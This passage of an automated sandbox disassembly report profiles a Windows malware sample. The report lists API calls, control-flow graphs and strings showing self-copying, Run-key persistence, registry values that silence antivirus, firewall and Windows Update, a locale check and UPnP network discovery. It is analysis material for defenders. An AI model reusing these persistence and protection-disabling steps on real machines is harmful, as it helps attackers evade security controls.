                                                                          • Instruction Fuzzy Hash: E771FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • Sleep.KERNEL32(000003E8), ref: 00406B3E
                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\135143440.exe,00000104), ref: 00406B50
                                                                            • Part of subcall function 0040E9B0: CreateFileW.KERNELBASE(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
                                                                            • Part of subcall function 0040E9B0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
                                                                            • Part of subcall function 0040E9B0: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040E9F2
                                                                          • ExitThread.KERNEL32 ref: 00406CBA
                                                                            • Part of subcall function 00406340: GetLogicalDrives.KERNELBASE ref: 00406346
                                                                            • Part of subcall function 00406340: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                            • Part of subcall function 00406340: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                            • Part of subcall function 00406340: RegCloseKey.KERNELBASE(?), ref: 004063DE
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00406CAD
                                                                            • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406BEF
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C04
                                                                          • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C1F
                                                                          • wsprintfW.USER32 ref: 00406C32
                                                                          • wsprintfW.USER32 ref: 00406C52
                                                                          • wsprintfW.USER32 ref: 00406C75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Filewsprintf$CloseSleep$ChangeCreateDiskDrivesExitFindFreeInformationLogicalModuleNameNotificationOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                          • String ID: (%dGB)$%s%s$C:\Users\user\AppData\Local\Temp\135143440.exe$Unnamed volume
                                                                          • API String ID: 899515741-1730570867
                                                                          • Opcode ID: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
                                                                          • Instruction ID: ad18969486da017d66fc0e664040911e0da7e4c37c3c5655858771b0e8e5c1cf
                                                                          • Opcode Fuzzy Hash: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
                                                                          • Instruction Fuzzy Hash: 6B41A9B1900318BBE714DB94DD55FEE7378EB48700F0081A5F20AB51D0EA785794CF6A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 270 402020-402032 call 409fd0 273 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 270->273 274 4021aa-4021ae 270->274 275 402076-402089 CreateIoCompletionPort 273->275 276 40219f-4021a8 call 401600 273->276 275->276 277 40208f-402099 call 40d370 275->277 276->274 277->276 282 40209f-4020b7 WSASocketA 277->282 282->276 283 4020bd-402120 setsockopt htons bind 282->283 283->276 284 402126-402138 listen 283->284 284->276 285 40213a-402145 WSACreateEvent 284->285 285->276 286 402147-402157 WSAEventSelect 285->286 286->276 287 402159-40215f 286->287 288 402161-402171 call 40d3a0 287->288 289 40217f-40218f call 40d3a0 287->289 292 402176-40217d 288->292 293 402194-40219e 289->293 292->288 292->289
                                                                          APIs
                                                                          • GetSystemInfo.KERNELBASE(?,?), ref: 00402043
                                                                          • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                            • Part of subcall function 0040D370: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D38E
                                                                          • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                          • setsockopt.WS2_32 ref: 004020D1
                                                                          • htons.WS2_32(?), ref: 00402101
                                                                          • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                          • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                          • WSACreateEvent.WS2_32 ref: 0040213A
                                                                          • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                            • Part of subcall function 0040D3A0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
                                                                            • Part of subcall function 0040D3A0: CreateThread.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 0040D41F
                                                                            • Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
                                                                            • Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
                                                                            • Part of subcall function 0040D3A0: DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
                                                                            • Part of subcall function 0040D3A0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                          • String ID:
                                                                          • API String ID: 1603358586-0
                                                                          • Opcode ID: 74b9e0b9d866c09383cccfd39bbcccf3aa71ca47d8d5121f17440fa7680103a3
                                                                          • Instruction ID: df8ad55f307143f3a92c653802a821764c0c55d7be8f2a3f3e8fe1ebc27bb844
                                                                          • Opcode Fuzzy Hash: 74b9e0b9d866c09383cccfd39bbcccf3aa71ca47d8d5121f17440fa7680103a3
                                                                          • Instruction Fuzzy Hash: 3F41AF70640701ABD3309F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E845875A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 311 40d950-40d977 socket 312 40dab1-40dab5 311->312 313 40d97d-40da45 htons inet_addr setsockopt call 40acc0 bind lstrlenA sendto ioctlsocket 311->313 315 40dab7-40dabd 312->315 316 40dabf-40dac5 312->316 318 40da4b-40da52 313->318 315->316 319 40da54-40da63 call 40dad0 318->319 320 40daa5-40daa9 call 40ad80 318->320 323 40da68-40da70 319->323 324 40daae 320->324 325 40da72 323->325 326 40da74-40daa3 call 40a220 323->326 324->312 325->320 326->318
                                                                          APIs
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
                                                                          • htons.WS2_32(0000076C), ref: 0040D9A0
                                                                          • inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
                                                                          • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD
                                                                            • Part of subcall function 0040ACC0: htons.WS2_32(00000050), ref: 0040ACED
                                                                            • Part of subcall function 0040ACC0: socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
                                                                            • Part of subcall function 0040ACC0: connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
                                                                            • Part of subcall function 0040ACC0: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58
                                                                          • bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
                                                                          • lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
                                                                          • sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
                                                                          • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45
                                                                            • Part of subcall function 0040DAD0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
                                                                            • Part of subcall function 0040DAD0: Sleep.KERNELBASE(000003E8), ref: 0040DB2E
                                                                            • Part of subcall function 0040DAD0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
                                                                            • Part of subcall function 0040DAD0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
                                                                            • Part of subcall function 0040DAD0: StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                          • String ID: 239.255.255.250
                                                                          • API String ID: 726339449-2186272203
                                                                          • Opcode ID: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
                                                                          • Instruction ID: 776be564c15d3a67ad3e8e206458624d982b0507424591c965b87a75806c6374
                                                                          • Opcode Fuzzy Hash: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
                                                                          • Instruction Fuzzy Hash: 1541E9B4E04208ABDB14DFE4D889BEEBBB5AF48304F108169E505B7390E7B55A44CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                          • htons.WS2_32(?), ref: 00401508
                                                                          • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                          • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                            • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                            • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(Function_00001100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                            • Part of subcall function 00401330: CloseHandle.KERNEL32(Function_00001100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401569
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                          • String ID:
                                                                          • API String ID: 4174406920-0
                                                                          • Opcode ID: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                                                          • Instruction ID: 9f6d7f02e8121356806164c5164031e4b64ed467ed2b657d4572fa9387097a74
                                                                          • Opcode Fuzzy Hash: 085a1a8f7e688ed9381a465e3f998c9afd0c9800f7049c23b91f22d3bd70f74c
                                                                          • Instruction Fuzzy Hash: E131C871A44301AFE320DF649C46F9BB6E0AF48B10F40493DF695EB2E0D3B5D544879A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • htons.WS2_32(00000050), ref: 0040ACED
                                                                            • Part of subcall function 0040AC80: inet_addr.WS2_32(0040AD01), ref: 0040AC8A
                                                                            • Part of subcall function 0040AC80: gethostbyname.WS2_32(?), ref: 0040AC9D
                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
                                                                          • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58
                                                                          Strings
                                                                          • www.update.microsoft.com, xrefs: 0040ACF7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                          • String ID: www.update.microsoft.com
                                                                          • API String ID: 4063137541-1705189816
                                                                          • Opcode ID: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
                                                                          • Instruction ID: ba3e2b0e6fec23725a126dc2d5d77dfcfe6771dbae9c9e174257d4c79807ff88
                                                                          • Opcode Fuzzy Hash: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
                                                                          • Instruction Fuzzy Hash: BA210BB5E103099BDB04DFF8D946AEEBBB5AF08300F108169E515F7390E7745A44CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CryptAcquireContextW.ADVAPI32(~|@,00000000,00000000,00000001,F0000040,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0D3
                                                                          • CryptGenRandom.ADVAPI32(~|@,?,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0E9
                                                                          • CryptReleaseContext.ADVAPI32(~|@,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                          • String ID: ~|@
                                                                          • API String ID: 1815803762-1417210658
                                                                          • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                          • Instruction ID: 64b452c5f04e5b6757705d6885a7ff86aea398e2a213dd3f660bad642ac62f97
                                                                          • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                          • Instruction Fuzzy Hash: F6E01275654208FBDB24CFD5EC49FDA776CAB48700F108154F709A7190DAB5EA40DBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D79D,00000000), ref: 004013D5
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                          • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                            • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                            • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(Function_00001100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                            • Part of subcall function 00401330: CloseHandle.KERNEL32(Function_00001100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                          • String ID:
                                                                          • API String ID: 3943618503-0
                                                                          • Opcode ID: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                                                          • Instruction ID: 53638d0e5b86ff224420f1c7f9a69720ea7b841d4339b56c2ae1fb68745f7462
                                                                          • Opcode Fuzzy Hash: 7920f1fa20b97f550be2e13ac393b81d85ae9c1e65d5af07afafdd8883ae4a63
                                                                          • Instruction Fuzzy Hash: CA11B974A40710AFE360DF749C0AF877AE0AF04B14F50892DF599E72E1E3F49544878A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,004075B8), ref: 0040E983
                                                                          • strcmp.NTDLL ref: 0040E992
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocalestrcmp
                                                                          • String ID: UKR
                                                                          • API String ID: 3191669094-64918367
                                                                          • Opcode ID: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
                                                                          • Instruction ID: aa0b77ea91eb2b23b28eec9c342f5ca45138d15d753f47792771d9b4db2dab4a
                                                                          • Opcode Fuzzy Hash: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
                                                                          • Instruction Fuzzy Hash: FEE0C272A4430876DA10A6A1AE03BAA771C5F11701F000076AF04A61C1E9B9962992DB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407250
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInstance
                                                                          • String ID:
                                                                          • API String ID: 542301482-0
                                                                          • Opcode ID: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                                                          • Instruction ID: ca69fba6b54e64f770d722f29a675e987051da8ecabaa1b948e8599c783208a7
                                                                          • Opcode Fuzzy Hash: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                                                          • Instruction Fuzzy Hash: 87E0C97490420CBFDB00DFA0C889B9EBBB8AB08715F1081A9E90467280D7B56A948B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 4074d0-407504 Sleep CreateMutexA GetLastError 1 407506-407508 ExitProcess 0->1 2 40750e-4075ad GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075b3-4075be call 40e970 2->3 4 40773a-407765 Sleep RegOpenKeyExW 2->4 14 4075c0-4075c2 ExitProcess 3->14 15 4075c8-407616 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407793-4077b3 RegOpenKeyExW 4->5 6 407767-40778d RegSetValueExA RegCloseKey 4->6 8 4077b5-4077e1 RegSetValueExA RegCloseKey 5->8 9 4077e6-407806 RegOpenKeyExW 5->9 6->5 11 4078e2-407902 RegOpenKeyExW 8->11 12 407808-407837 RegCreateKeyExW RegCloseKey 9->12 13 40783d-40785d RegOpenKeyExW 9->13 18 407930-407950 RegOpenKeyExW 11->18 19 407904-40792a RegSetValueExA RegCloseKey 11->19 12->13 16 407894-4078b4 RegOpenKeyExW 13->16 17 40785f-40788e RegCreateKeyExW RegCloseKey 13->17 20 407687-4076c9 Sleep wsprintfW CopyFileW 15->20 21 407618-407647 SetFileAttributesW RegOpenKeyExW 15->21 16->11 23 4078b6-4078dc RegSetValueExA RegCloseKey 16->23 17->16 25 407952-407978 RegSetValueExA RegCloseKey 18->25 26 40797e-40799e RegOpenKeyExA 18->26 19->18 20->4 22 4076cb-4076fa SetFileAttributesW RegOpenKeyExW 20->22 21->20 24 407649-407681 wcslen RegSetValueExW RegCloseKey 21->24 22->4 27 4076fc-407734 wcslen RegSetValueExW RegCloseKey 22->27 23->11 24->20 25->26 28 4079a4-407a84 RegSetValueExA * 7 RegCloseKey 26->28 29 407a8a-407aaa RegOpenKeyExA 26->29 27->4 28->29 30 407ab0-407b90 RegSetValueExA * 7 RegCloseKey 29->30 31 407b96-407bab Sleep call 40ca10 29->31 30->31 34 407d20-407d29 31->34 35 407bb1-407d09 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40d880 call 406f50 CreateEventA call 40c140 call 40d370 call 40b500 call 40d3a0 * 4 call 40d510 31->35 59 407d0e-407d1d call 40d650 35->59 59->34
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 004074DE
                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,ax765638x6xa), ref: 004074ED
                                                                          • GetLastError.KERNEL32 ref: 004074F9
                                                                          • ExitProcess.KERNEL32 ref: 00407508
                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\135143440.exe,00000105), ref: 00407542
                                                                          • PathFindFileNameW.SHLWAPI(C:\Users\user\AppData\Local\Temp\135143440.exe), ref: 0040754D
                                                                          • wsprintfW.USER32 ref: 0040756A
                                                                          • DeleteFileW.KERNELBASE(?), ref: 0040757A
                                                                          • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407591
                                                                          • wcscmp.NTDLL ref: 004075A3
                                                                          • ExitProcess.KERNEL32 ref: 004075C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                          • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\AppData\Local\Temp\135143440.exe$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$CheckedValue$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$ax765638x6xa$sysvratrel.exe
                                                                          • API String ID: 4172876685-1267113774
                                                                          • Opcode ID: c210d785436f2f0940d6693cbe524f03ff9d77bd905ac6bc26fc141802259303
                                                                          • Instruction ID: 01c652a6eea3614599500b2dbdc2b26867472a33c88adbc755e5585b16fefd61
                                                                          • Opcode Fuzzy Hash: c210d785436f2f0940d6693cbe524f03ff9d77bd905ac6bc26fc141802259303
                                                                          • Instruction Fuzzy Hash: 582275B1B80318BBE7209B90DC4AFE97775AB4CB05F5080A9B305BA1D1D6F4A984CF5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040ED29
                                                                          • srand.MSVCRT ref: 0040ED30
                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040ED50
                                                                          • strlen.NTDLL ref: 0040ED5A
                                                                          • mbstowcs.NTDLL ref: 0040ED71
                                                                          • rand.MSVCRT ref: 0040ED79
                                                                          • rand.MSVCRT ref: 0040ED8D
                                                                          • wsprintfW.USER32 ref: 0040EDB4
